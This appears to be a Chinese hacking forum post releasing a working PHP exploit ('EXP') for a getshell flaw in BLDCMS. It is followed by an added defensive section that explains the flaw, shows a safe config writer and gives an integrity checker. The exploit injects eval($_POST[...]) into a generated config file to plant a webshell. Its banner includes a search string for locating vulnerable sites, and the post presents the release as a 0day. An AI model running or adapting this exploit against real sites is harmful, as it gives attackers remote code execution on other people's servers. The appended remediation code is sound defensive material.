Earlier I wanted to go after a hacker's site and noticed that a neighbouring site on the same server ran BLDCMS, so I downloaded it and had a look... and found a getshell vulnerability.

Then last night 晴天小铸 found that someone on 90sec had already posted an analysis of this getshell bug. Damn, someone beat me to it.

Since it's already out there, I'll release the EXP I had written earlier.
<?php
// Banner with usage: php.exe EXP.php <host> <cms directory> <webshell password>
echo "-------------------------------------------------------------------------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP (GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun QQ:981009941\r\n 2013.3.21\r\n 用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-------------------------------------------------------------------------------\r\n";
$url=$argv[1];
$dir=$argv[2];
$pass=$argv[3];
// Value that closes the quoted literal in the generated config file and appends an eval() of the chosen POST parameter
$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
if (empty($pass)||empty($url))
{
    exit("请输入参数");
}
else
{
    // Form fields expected by admin/chuli.php; the sqlite field carries the payload
    $fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$eval;
    $length = strlen($fuckdata);
    function getshell($url,$pass)
    {
        global $url,$dir,$pass,$eval,$length,$fuckdata;
        // Raw HTTP request assembled by hand and sent over a plain socket
        $header = "POST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
        $header .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $header .= "User-Agent: MSIE\r\n";
        $header .= "Host:".$url."\r\n";
        $header .= "Content-Length: ".$length."\r\n";
        $header .= "Connection: Close\r\n";
        $header .= "\r\n";
        $header .= $fuckdata."\r\n\r\n";
        $fp = fsockopen($url, 80,$errno,$errstr,15);
        if (!$fp)
        {
            exit ("利用失败:请检查指定目标是否能正常打开");
        }
        else
        {
            if (!fputs($fp,$header))
            {
                exit ("利用失败");
            }
            else
            {
                // Read the response to completion before closing the socket
                $receive = '';
                while (!feof($fp)) {
                    $receive .= @fgets($fp, 1000);
                }
                @fclose($fp);
                echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标GPC是否=off)";
            }
        }
    }
    getshell($url,$pass);
}
?>
by 数据流
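What the EXP above relies on can be read off its payload: the sqlite form value is written by the CMS into conn/config/normal2.php as a quoted PHP literal without escaping, so once magic_quotes_gpc is off a quote in the value ends the literal and whatever follows becomes code the next time the file is included. The following is an added example written for this page; it is not BLDCMS code and not part of the original post. It puts that unsafe writer pattern next to a safe one and adds a token-level check an auditor can run over a generated config file to see whether it contains anything but plain assignments. The function names and the sample value are assumptions made for the example.

```php
<?php
// Added example, not BLDCMS code and not part of the original post. It shows the
// pattern the exploit relies on (a POST value written into a PHP config file as a
// quoted literal) next to a safe writer, plus a token-level check that tells an
// auditor whether a generated config file contains anything but plain assignments.
// Function names and the sample value below are assumptions made for this example.

// Unsafe: the value is interpolated inside single quotes. With magic_quotes_gpc off
// (and on any PHP >= 5.4, where the setting no longer exists) a quote in the value
// closes the literal and the rest of the value is parsed as PHP when the file loads.
function unsafeConfigLine(string $key, string $value): string
{
    return "\$config['$key'] = '$value';\n";
}

// Safe: var_export() emits a valid PHP literal and escapes quotes and backslashes,
// so the value can only ever be a string. The key is restricted to an identifier
// so it cannot break out of the line either.
function safeConfigLine(string $key, string $value): string
{
    if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $key)) {
        throw new InvalidArgumentException("config key must be an identifier: $key");
    }
    return '$config[' . var_export($key, true) . '] = ' . var_export($value, true) . ";\n";
}

// Integrity check for a generated config file such as conn/config/normal2.php: the
// only tokens allowed are the open tag, whitespace, $config, string/number literals,
// true/false/null and the punctuation of "$config['k'] = 'v';". eval, $_POST, any
// function name, parentheses or a second open tag all fail the check.
function configFileIsClean(string $source): bool
{
    $allowedPunct  = ['[', ']', '=', ';'];
    $allowedTokens = [T_OPEN_TAG, T_WHITESPACE, T_VARIABLE, T_CONSTANT_ENCAPSED_STRING,
                      T_LNUMBER, T_DNUMBER, T_STRING];
    foreach (token_get_all($source) as $token) {
        if (is_string($token)) {                       // single-character tokens
            if (!in_array($token, $allowedPunct, true)) {
                return false;
            }
            continue;
        }
        [$id, $text] = $token;
        if (!in_array($id, $allowedTokens, true)) {
            return false;
        }
        if ($id === T_VARIABLE && $text !== '$config') {
            return false;                              // $_POST, $_GET, $_REQUEST ...
        }
        if ($id === T_STRING && !in_array(strtolower($text), ['true', 'false', 'null'], true)) {
            return false;                              // bare word = function or constant
        }
    }
    return true;
}

// Constructed sample value: a quote that closes the literal followed by a harmless
// statement, the same shape as the sqlite value sent by the EXP above.
$tainted = "x'; echo 'injected'; //";

$unsafeFile = "<?php\n\$config = [];\n" . unsafeConfigLine('sqlite', $tainted);
$safeFile   = "<?php\n\$config = [];\n" . safeConfigLine('sqlite', $tainted);

var_dump(configFileIsClean($unsafeFile));   // the echo has become a statement
var_dump(configFileIsClean($safeFile));     // the whole value is one string literal
```

Run with `php example.php`: the file built by unsafeConfigLine fails the check because the lexer sees an `echo` statement after the closed literal, while the file built by safeConfigLine passes because var_export kept the entire value inside one string token. The check is deliberately strict, so a hand-edited file with comments or computed values will also be rejected; it is meant for files the application itself generates, where nothing beyond literal assignments should ever appear. The more durable fix is to not emit PHP at all and store such settings in JSON or a database, which removes the parse step the injection depends on.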